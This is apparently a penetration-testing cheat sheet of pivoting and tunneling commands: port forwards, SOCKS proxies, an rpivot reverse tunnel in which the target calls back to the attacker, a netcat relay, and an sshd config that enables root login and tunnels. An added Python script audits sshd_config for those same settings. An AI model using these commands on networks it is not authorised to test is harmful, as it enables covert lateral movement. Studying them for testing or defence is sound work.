Pivoting and Tunneling
Local port forward
portfwd add -l <lport> -p <rport> -r <ip_target>
plink -l root -pw pass -R <rport>:127.0.0.1:<lport> <ip_target> -P <ssh_port> -N
ssh -D <lport> -p <ssh_port> <ip_target>
Remote port forward
Rpivot
Listener attacker
python server.py --proxy-port <1080> --server-port <80> --server-ip <ip>
Targeted machine
python client.py --server-ip <ip> --server-port <80>
Proxy SOCKS
use auxiliary/server/socks4a
run -j
route add <ip/range> <session>
Then use proxychains (only fully connected TCP is relayed; no UDP or ICMP)
ssh -D 127.0.0.1:1080 -i <key> <user>@<target_ip>
Browser
chromium --no-sandbox --proxy-server="socks4://<ip>:<port>"
2 Hops
Tunneling
SSH tunneling
Works with socks4/5
plink.exe -v -N -D localhost:<lport> <user>@<ip_target>
In burp: localhost + <lport>
VPN over SSH (not tested)
/etc/ssh/sshd_config
PermitRootLogin yes
PermitTunnel yes
ssh <user>@<ip> -w any:any
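The SSH-VPN trick above only works because sshd allows it. As an added defender-side example (my code, not part of this cheat sheet), the script below parses sshd_config text and flags the two settings the trick depends on, PermitTunnel and PermitRootLogin, using sshd's own rule that the first occurrence of a keyword wins. It audits only the global section (assumption: anything after a Match block is skipped) and treats an absent PermitTunnel as the default "no". The sample configs are constructed.

```python
"""Audit sshd_config text for settings that enable the `ssh -w any:any` tunnel.

Added example, not from the original cheat sheet. Assumptions: only the global
section is audited (parsing stops at the first Match block) and an absent
PermitTunnel means sshd's default of "no".
"""
import re

# Values that enable the layer-3/2 tunnel or root login, and the hardened value.
RISKY = {
    "permittunnel": ("yes", "point-to-point", "ethernet"),
    "permitrootlogin": ("yes",),
}
HARDENED = {"permittunnel": "no", "permitrootlogin": "no"}

# Constructed samples: the first mirrors the cheat sheet, the second is hardened.
WEAK_CONFIG = """
Port 22
PermitRootLogin yes
PermitTunnel yes
"""
HARDENED_CONFIG = """
Port 22
PermitRootLogin no
PermitTunnel no
PermitRootLogin yes   # duplicate later in the file is ignored by sshd
"""


def parse_sshd_config(text):
    """Return {keyword_lower: value} for the effective global settings.

    sshd uses the first occurrence of each keyword, so later duplicates
    are ignored. Comments and blank lines are dropped; keywords may be
    separated from values by whitespace or '='.
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.lower().startswith("match "):
            break  # conditional section; out of scope for this audit
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        settings.setdefault(key, value)  # first occurrence wins
    return settings


def audit(text):
    """Return [(keyword, current_value, recommended_value), ...] findings."""
    settings = parse_sshd_config(text)
    findings = []
    for key, risky_values in RISKY.items():
        value = settings.get(key)
        if value is not None and value.lower() in risky_values:
            findings.append((key, value, HARDENED[key]))
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit(cfg))
```

Run it against a real file with `audit(open("/etc/ssh/sshd_config").read())`; an empty list means neither setting permits the tunnel in the global section.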
Encapsulate UDP in TCP stream
socat -v UDP-LISTEN:<4444>,fork TCP:localhost:<4444>
Bypass DPI (not tested)
http_tunnel
stunnel
Netcat Relay
mknod backpipe p
nc -lp <inbound_port> 0<backpipe | nc 127.0.0.1 22 1>backpipe
ssh <login>@<target_machine> -p <inbound_port>
sshuttle
sshuttle -r <username>@<sshserver> <target_lan_CIDR>
sshuttle --dns --ssh-cmd 'ssh -i <key>' -r root@<pivot_machine> <target_lan_CIDR>